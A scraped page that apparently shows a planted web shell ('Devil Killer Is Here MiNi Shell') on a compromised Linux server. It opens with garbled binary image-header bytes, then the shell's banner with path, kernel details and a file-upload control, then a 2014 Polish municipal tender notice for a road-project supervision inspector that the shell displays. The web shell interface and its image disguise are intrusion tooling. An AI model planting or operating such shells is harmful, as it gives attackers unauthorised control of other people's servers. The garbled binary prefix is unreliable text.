JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140319/58235-N-2014.html

<p class="kh_header"><b>Rossosz: Pełnienie funkcji INSPEKTORA NADZORU INWESTORSKIEGO w ramach przedsięwzięcia pod nazwą Poprawa dostępności obszaru turystycznego Dolina Zielawy oraz gmin partnerskich na pograniczu Polski, Białorusi i  Ukrainy</b><br>
<b>Numer ogłoszenia: 58235 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rossosz , ul. Lubelska 8, 21-533 Rossosz, woj. lubelskie, tel. 0-83 378 45 57, faks 0-83 378 45 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rossosz.bip.lublin.pl,  gmina@rossosz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji INSPEKTORA NADZORU INWESTORSKIEGO w ramach przedsięwzięcia pod nazwą Poprawa dostępności obszaru turystycznego Dolina Zielawy oraz gmin partnerskich na pograniczu Polski, Białorusi i  Ukrainy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji INSPEKTORA NADZORU INWESTORSKIEGO obejmować będzie poniższy szczegółowy zakresie usługi: 
1.  INSPEKTOR NADZORU INWESTORSKIEGO będzie reprezentował inwestora na budowie w sprawach związanych z realizacją inwestycji i będzie odpowiedzialny za realizację projektu zgodnie z dokumentacjami projektowo-technicznymi i pozwoleniami na budowę oraz będzie zobowiązany do; 1.1. Nawiązania stałej i ścisłej współpracy z osobami pełniącymi funkcje MENAGERA  PROJEKTU w niniejszym przedsięwzięciu. 1.2. Systematycznego monitorowania przebiegu realizacji inwestycji w poszczególnych gminach partnerskich uczestniczących w projekcie i systematycznego gromadzenia dokumentów, informacji i danych oraz sporządzania i przekazywania MENAGEROWI PROJEKTU i Zamawiającemu - LIDEROWI, sprawozdań i innych niezbędnych danych dotyczących realizowanej inwestycji w wymaganych terminach. 1.3.  Zapewnienia uprawnionym podmiotom oraz MENAGEROWI PROJEKTU i Zamawiającemu prawa do pełnego wglądu we wszystkie zgromadzone przez INSPEKTORA NADZORU INWESTORSKIEGO dokumenty dotyczące przedmiotowej inwestycji, w tym także dokumentacji elektronicznej, przez cały okres jej przechowywania wraz z umożliwieniem tworzenia ich uwierzytelnionych kopii i odpisów. 1.4. Udzielania niezbędnej pomocy MENAGEROWI PROJEKTU podczas sporządzania wszelkich sprawozdań i wniosków okresowych i końcowych o płatność do instytucji dofinansowującej  projekt. 1.5. Udzielania niezbędnej pomocy MENAGEROWI PROJEKTU w prowadzeniu promocji projektu i udostępnianiu informacji o realizacji projektu opinii publicznej oraz pełnienia bezpośredniego nadzoru nad ustawianiem we właściwych miejscach odpowiednich tablic informacyjnych o zrealizowanej inwestycji w każdej z gmin partnerskich. 1.6. Przygotowania do archiwizacji posiadanych dokumentów i korespondencji dotyczącej przebiegu procesu realizacji inwestycji. 2. Do obowiązków INSPEKTORA NADZORU INWESTORSKIEGO z zakresu prowadzenia   procesu inwestycyjnego na terenie gmin partnerskich z Polski będzie należało: 2.1. Udzielanie niezbędnej pomocy w przeprowadzeniu postępowania przetargowego na Wykonawcę robót budowlanych, w tym przed podpisaniem umowy z wybranym Wykonawcą robót budowlanych dokona sprawdzenia pod względem zgodności z opracowana dokumentacja techniczną oraz pod względem merytorycznym i rachunkowym przedstawionego kosztorysu ofertowego wybranego w postępowaniu przetargowym Wykonawcy robót budowlanych. 2.2. Nawiązanie ścisłej współpracy w przedmiocie realizowanej inwestycji z ustanowionymi przez Wykonawcę robót budowlanych Kierownikami poszczególnych budów i rodzajów robót. 2.3. Opracowanie wspólnie z Wykonawcą robót budowlanych i jego Kierownikami budów i robót Harmonogramu cyklu realizacji inwestycji oraz  jego uzgodnienie z MENAGEREN PROJEKTU i inwestorem LIDEREM, a następnie systematyczne monitorowanie zgodności postępu prac budowlanych z opracowanym  Harmonogramem. 2.4. Pełnienie stałego nadzoru nad przebiegiem cyklu realizacji budowy oraz zgodnością wykonywanych prac z zawartymi umowami, a także uzyskanymi pozwoleniami na budowę dróg oraz z dokonanymi zgłoszeniami robót budowlanych do starostw, a także z dokumentacją projektową oraz ze  sztuką budowlaną i z przepisami Prawa budowlanego  Dz. U. 2013, poz. 1409 j. t., oraz innymi obowiązującymi przepisami dotyczącymi realizacji przedmiotu inwestycji. 2.5.  Prowadzenie stałej kontroli jakości wykonywanych robót wraz ze sprawdzaniem jakości przeznaczonych do wbudowania materiałów i wyrobów budowlanych oraz wyrażaniem zgody na ich wbudowanie, przy jednoczesnym niedopuszczaniu do stosowania materiałów i wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie. 2.6.  Systematyczne sprawdzanie wykonanych przez Wykonawcę robót budowlanych oznakowań odcinków dróg, na których będą lub są prowadzone przedmiotowe  prace budowlane. 2.7. Sprawowanie stałego nadzór nad przestrzeganiem przez uczestników procesu budowlanego przepisów ppoż. oraz Bezpieczeństwa i Higieny Pracy, przepisów ochrony środowiska i ruchu drogowego w obrębie miejsc wykonywania robót budowlanych, które powinny zapewniać bezpieczeństwo zarówno uczestnikom procesu inwestycyjnego jak i osobom postronnym, które nawet gdyby przypadkowo znalazły się na terenie lub w pobliżu terenu wykonywania robót budowlanych. W przypadku stwierdzenia zagrożenia podejmowanie natychmiastowych działań zmierzających do likwidacji powstałego zagrożenia i przyczyny jego powstania. 2.8. Systematyczne kontrolowanie wpisów dokonanych w Dziennikach budów przez Kierowników budów i robót i inne uprawnione osoby oraz rozwiązywaniu wszelkich problemów związanych z realizacją robót budowlanych na poszczególnych budowach, łącznie z rozpatrywaniem ewentualnych roszczeń Wykonawców robót budowlanych, jak i innych uczestników procesu budowlanego, a także opracowanie i przedstawienie MENAGEROWI PROJEKTU i Zamawiającemu propozycji rozwiązania każdego zaistniałego zdarzenia. 2.9.  Uczestniczenie w kontrolach przeprowadzanych przez Organy Nadzoru Budowlanego i inne organy uprawnione do kontroli oraz opracowanie wspólnie z MENAGEREM PROJEKTU i przedstawianie Zamawiającemu propozycji wykonania zaleceń nałożonych w wyniku tych kontroli, a po uzyskaniu akceptacji Zamawiającego pełnienie nadzoru nad ich wykonaniem. 2.10. Systematyczne monitorowanie przebiegu realizacji inwestycji w poszczególnych gminach oraz niezwłoczne informowanie Zamawiającego o zmianach w Harmonogramach poszczególnych robót, a także o wszystkich niezgodnościach z zatwierdzonymi projektami budowlanymi, oraz o wszelkich innych stwierdzonych nieprawidłowościach, które mogą mieć wpływ na proces realizacji inwestycji. 2.11. Systematyczne dokonywanie kontroli jakości wykonania robót i dokonywanie odbiorów robót ulegających zakryciu lub zanikających wraz z wyrażaniem zgody na ich zakrycie oraz sprawdzanie dokumentów rozliczeń częściowych, dokonywanie ich weryfikacji i uzgadnianie z władzami poszczególnych podmiotowych gmin, a także ich opiniowanie i przedstawianie do akceptacji Zamawiającemu. 2.12. Udzielanie niezbędnej pomocy MENAGEROWI PROJEKTU w organizowaniu w miarę potrzeb narad z udziałem wszystkich uczestników procesu budowlanego oraz aktywne uczestniczenie w tych naradach. 2.13. Przygotowaniem poszczególnych budów i niezbędnej dokumentacji do odbioru końcowego zrealizowanej inwestycji, łącznie ze sprawdzeniem wykonanych stałych oznakowań dróg oraz monitorowanie i prowadzenie działań zmierzających do uzyskania wszelkich wymaganych przepisami prawa opinii, uzgodnień i decyzji niezbędnych do zakończenia całego procesu inwestycyjnego. 2.14. Aktywne uczestniczenie w odbiorach końcowych poszczególnych dróg wykonanej inwestycji i przekazanie uprawnionym przedstawicielom danej gminy zakończonej inwestycji wraz z kompletną dokumentacją powykonawczą w stanie faktycznym i prawnym umożliwiającą natychmiastowe rozpoczęcie użytkowania. 2.15. Sprawdzanie i akceptowanie składanych przez Wykonawców robót budowlanych Kosztorysów powykonawczych i różnicowych, a także sprawdzanie, opisywanie  i akceptowanie do wypłaty składanych faktur/rachunków za wykonane roboty budowlane. 2.16. Udzielenie niezbędnej pomocy MENAGEROWI PROJEKTU w sporządzeniu dokumentacji rozliczeniowej końcowej wraz z uzgodnieniem jej z władzami zainteresowanej gminy oraz jej zaopiniowanie i uzgodnienie z Zamawiającym - LIDEREM. 2.17. Nadzorowanie usunięcia przez Wykonawcę robót budowlanych wszelkich ewentualnych wad i usterek stwierdzonych przez Komisję odbiorową podczas odbioru końcowego wykonanych robót, łącznie z przeprowadzeniem odbioru wykonanych prac naprawczych. 2.18. Wykonawca będzie zobowiązany również do świadczenia usługi i bycia w pełnej dyspozycji na wezwanie Zamawiającego w okresie udzielonej gwarancji i rękojmi, w tym uczestniczenia w corocznych przeglądach w okresie gwarancji wbudowanych dróg, na których pełnił obowiązki Inspektora Nadzoru Inwestorskiego, łącznie z nadzorowaniem i odbieraniem wykonywanych przez Wykonawcę robót budowlanych drogowych w ramach gwarancji napraw stwierdzonych wad  i usterek oraz uczestniczenie w pogwarancyjnym przeglądzie wybudowanych w/w dróg łącznie z dokonaniem zaopiniowania wykonanych przeglądów  wraz z nadzorowaniem i odbieraniem od Wykonawcę robót budowlanych drogowych wykonanych napraw w ramach pogwarancyjnego przeglądu. 2.19. Udzielenie niezbędnej pomocy MENAGEROWI PROJEKTU w dokonaniu rozliczenia końcowego całej inwestycji w gminach partnerskich obszaru turystycznego DOLINA ZIELAWY oraz opracowanie propozycji wysokości naliczonych ewentualnych koniecznych kar umownych lub odszkodowań należnych Zamawiającemu od danego Wykonawcy robót budowlanych. 3. Wykonawca udzieli gwarancji na wykonaną usługę na okres min. 36 miesięcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia WADIUM w jednej z kilku form określonych w art. 45 ust. 6 ustawy Pzp w wysokości 3.000,00 zł /trzy tysiące złotych/</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia z postępowania, a także przedstawi kserokopię aktualnych dokumentów z: 1. Właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. 2. Od właściwego Naczelnika Urzędu Skarbowego o nie zaleganiu z opłacaniem podatków. 3. Od właściwego Oddziału ZUS lub KRUS o nie zaleganiu z opłaceniem składek na ubezpieczenie zdrowotne i społeczne. 4. Z Krajowego Rejestru Karnego o nie figurowaniu w tym rejestrze. 
Ocena zostanie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeżeli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia niezbędnego do wykonania przedmiotu zamówienia Wykonawca spełni, jeżeli wykaże doświadczenie w pełnieniu funkcji INSPEKTORA NADZORU INWESTORSKIEGO w co najmniej dwóch projektach o wartości brutto każdego z nich minimum 5.000.000,00 zł. i udokumentuje za okres ostatnich 3 lat przed terminem składania ofert, a jeśli okres prowadzenia działalności jest krótszy to za ten okres, wraz z podaniem ich wartości przedmiotu usługi, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, oraz załączy dowody, czy zostały wykonane lub są wykonywane należycie.     
Ocena zostanie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeżeli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym w postaci niezbędnych narzędzi i urządzeń dostępnych Wykonawcy w celu zapewnienia właściwego wykonania przedmiotu zamówienia, wykonawca spełni, jeżeli złoży oświadczenie, że każda osoba, która będzie wykonywała przedmiot usługi, będzie dysponowała co najmniej jednym środkiem transportu.  
Ocena zostanie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeżeli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania przedmiotu zamówienia, Wykonawca spełni, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz posiadanych uprawnień niezbędnych do wykonania zamówienia, wynikających z przepisów Prawa budowlanego lub dyrektyw i umów międzynarodowych.   
Ocena zostanie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeżeli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek znajdowania się Wykonawcy w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zostanie spełniony, jeżeli Wykonawca wykaże, że posiada opłaconą polisę na kwotę minimum 50.000,00 zł. lub przedstawi inny równoważny dokument aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą jak 50.000,00 zł.
Ocena zostanie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeżeli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
